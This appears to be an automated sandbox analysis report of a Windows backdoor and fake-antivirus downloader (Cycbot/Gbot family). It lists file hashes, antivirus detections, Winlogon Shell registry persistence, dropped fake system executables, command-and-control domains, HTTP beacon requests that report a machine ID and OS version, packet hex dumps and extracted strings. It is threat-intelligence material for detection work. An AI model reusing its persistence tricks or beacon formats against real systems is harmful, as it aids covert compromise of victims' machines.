Analysis Date2014-06-15 05:12:42
MD57af9a5ea1a5cd8ef20a6302d37256c44
SHA135aac20e77150d967686a090db1247f42db97fe0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 45de3ccdb7f68a07bf3c8760e72155e9 sha1: d70daa7844c1770ff97303ede97a72c4b188665e size: 65536
Section.rdata md5: 61586231efe18ff8b309f6250f80da75 sha1: a1c74253f4a2fbac43a0f8b8eba87b1401805b4f size: 2048
Section.data md5: e27166ba3a0124b1acf488bd3365a455 sha1: 41b37d3a7f856fcfa1bf89d1c4843a5cac473dba size: 47616
Section.rsrc md5: 73828cdd6196c6d41c034a759186e68b sha1: da4b9df52069578ad0459fa1a9ecf8bc45e6ec0f size: 1024
Timestamp2005-10-17 12:28:44
VersionLegalCopyright: Copyright (C) 2010
ProductVersion: 1, 0, 0, 2
PrivateBuild: 1130
FileVersion: 1, 0, 0, 2
FileDescription: MS Shell
PEhash4c2841640de7c3ff074bfc4ff59288fb734c8bb6
IMPhashaa5309cda6ec83be6de02dfe4c511cad
AV360 SafeGen:Heur.Conjar.9
AVAd-AwareGen:Heur.Conjar.9
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Downloader.Fraudload.Xzdf
AVAuthentiumW32/Goolbot.A.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Downloader-100611
AVDr. WebTrojan.Siggen2.7329
AVEmsisoftGen:Heur.Conjar.9
AVEset (nod32)Win32/Kryptik.HVW
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.A.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Heur.Conjar.9
AVGrisoft (avg)Cryptic.BFI
AVIkarusTrojan.Win32.FakeAV
AVKasperskyTrojan-Downloader.Win32.FraudLoad.xzdf
AVMalwareBytesBackdoor.Gbot
AVMcafeeBackDoor-EXI.gen.d
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.9
AVNormanwinpe/Suspicious_Gen2.EVANU
AVRisingno_virus
AVSophosTroj/Bckdr-REM
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYBOT.SMA
AVVirusBlokAda (vba32)TrojanDownloader.FraudLoad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSwww.google.com
Winsock DNS127.0.0.1
Winsock DNSwww.8minutedating.com
Winsock DNScheckserverstatux.com
Winsock DNSwhysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Network Details:

DNSwww.8minutedating.com
Type: A
69.9.181.104
DNSwww.google.com
Type: A
64.233.171.104
DNSwww.google.com
Type: A
64.233.171.105
DNSwww.google.com
Type: A
64.233.171.106
DNSwww.google.com
Type: A
64.233.171.147
DNSwww.google.com
Type: A
64.233.171.99
DNSwww.google.com
Type: A
64.233.171.103
DNSprotectyourpc-11.com
Type: A
69.43.161.170
DNSwhysohardx.com
Type: A
DNScheckserverstatux.com
Type: A
HTTP GEThttp://www.8minutedating.com/images/attend_for_free/attend35.jpg?tq=gHZutDyMv5rJejDia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_6&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 69.9.181.104:80
Flows TCP192.168.1.1:1032 ➝ 64.233.171.104:80
Flows TCP192.168.1.1:1033 ➝ 64.233.171.104:80
Flows TCP192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1035 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1036 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 61747465   GET /images/atte
0x00000010 (00016)   6e645f66 6f725f66 7265652f 61747465   nd_for_free/atte
0x00000020 (00032)   6e643335 2e6a7067 3f74713d 67485a75   nd35.jpg?tq=gHZu
0x00000030 (00048)   7444794d 7635724a 656a4469 61396e72   tDyMv5rJejDia9nr
0x00000040 (00064)   6d736c36 6769577a 2532424a 5a625679   msl6giWz%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 7777772e 386d696e   ..Host: www.8min
0x00000080 (00128)   75746564 6174696e 672e636f 6d0d0a41   utedating.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 2532424a 5a625679    */*....%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 7777772e 386d696e   ..Host: www.8min
0x00000080 (00128)   75746564 6174696e 672e636f 6d0d0a41   utedating.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 2532424a 5a625679    */*....%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 7777772e 386d696e   ..Host: www.8min
0x00000080 (00128)   75746564 6174696e 672e636f 6d0d0a41   utedating.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   36266e3d 30266578 7472613d 30204854   6&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
.
h.
..
K...
040904b0
1, 0, 0, 2
1130
Copyright (C) 2010
FileDescription
FileVersion
LegalCopyright
&Main
MS Sans Serif
MS Shell
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
:[1|00
=18\qwX
3rg-^!
`4EIM_J"{
4QfW.	
5{[DVb
5P9A2[
=(;6tS0
#6t.va
6%y5-+
7"4^aTz
7	X; vI
 ';8/`
'8N{sj
8q37X)1~
|8W2 LI#
9'k2l2~BJ
9P/(("8
_9SdXM=
;a51*b
aKpR56
apkV96
B}{`=J
c{eG;B
C]G2 j
CloseHandle
CreateDirectoryW
CreateFileW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
CryptEnumOIDInfo
<"-d4`(
@.data
DDRAW.dll
DecodePointer
DeleteFileW
dh[,	%
DirectDrawCreateClipper
<DQ7X]
...\DW
d]	yFk
EnumUILanguagesW
eP-k<y
'[eTuhA
#eULVc
ExitProcess
ExpandEnvironmentStringsW
/F54k,
!FDT^Sx
f=f8Jn
FH{Xz+
"F]IGC
"]F}'n
fn.X)7
FreeLibrary
GcCBbX
{ GC=qqlhd
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleW
GetProcAddress
GetProcessVersion
GetSystemTimeAsFileTime
GetTickCount
GetVersionExA
G)n@1N
($gr~q!
gR,uMS
H"_0-z
hC$RCC%
"hL/RY
Hq=z.&
{huak^)l
h	!X[V
hy)aKE
{hYhUF@
I ;7'Wh
]iC0s;
IIVPJ)"
InterlockedCompareExchange
InterlockedExchange
_ioXU-&
iSk+DU
;>Ix)K|
-`j1"N
jD[mU&
jh+D1(
,"jJGD
jmyE7`
j|NH8W
]JnY5X
JQ{|kc
k_1Z	-P
/KBVA&$p-5
KERNEL32.dll
KI3*zu
k`~qXZm
krT SG
Ldlhk5
(lf*?iO@
L=i>iS
LoadLibraryExW
LoadLibraryW
LocalAlloc
LocalFree
l{?RsC
lstrcmpW
lstrlenW
Lyo@o TO
.L<ZUAL
m /6X.
m$&A{X
M(h~3@
mmJO\i
MoveFileW
MRhXl=
M[r>Ok
];\()n`
)N^Cs>#
'nM[Ixq
N[ML|v
ntdll.dll
n^%Z8}
-{](Oa
OpenEventW
op*O6;
:ORJ^&
PathFileExistsW
PathFindFileNameW
P)H{hV
PPPa6Iz
PPPFP)
}p.QKb
P ;XwX
 pZ ~	B
q/5/*B""HE
qgV'o8
];\Q-p
q`{PS%
qRYE0I2X
QueryPerformanceCounter
`.rdata
RtlUnwind
RU4hTh
SetConsoleMode
SetUnhandledExceptionFilter
SHELL32.dll
SHGetFolderPathAndSubDirW
SHLWAPI.dll
SHSetLocalizedName
S??pmc?l
StrCmpNW
StrStrW
SZ/4iM
T+7xOd
TerminateProcess
!This program cannot be run in DOS mode.
ThlFre
ThLibrhWX@
ThLoad
Throte
ThualPh
:TM 83
%Tp=mTG
^^^U?a
>U/&ax
u$h{f@
U=>-N	
UnhandledExceptionFilter
vLA:x*
Vo@V{G
[)vV%*
?.w$?1
w&]21$
WaitForSingleObject
wC3J	~
W&F'Q*5
+wK~ `zb
W[)L^1"
w/L]!.=d
WntRU92
W@>Q>*
WriteFile
W}Y4Z#
X1mP)KIg
-!.x}	3L
x3zUh?d
y2Ybdi
Ymq$%]
]yQ^MP
Yu^olwe
:-Z7+P/b_
z	$	%J
;Z~@RMI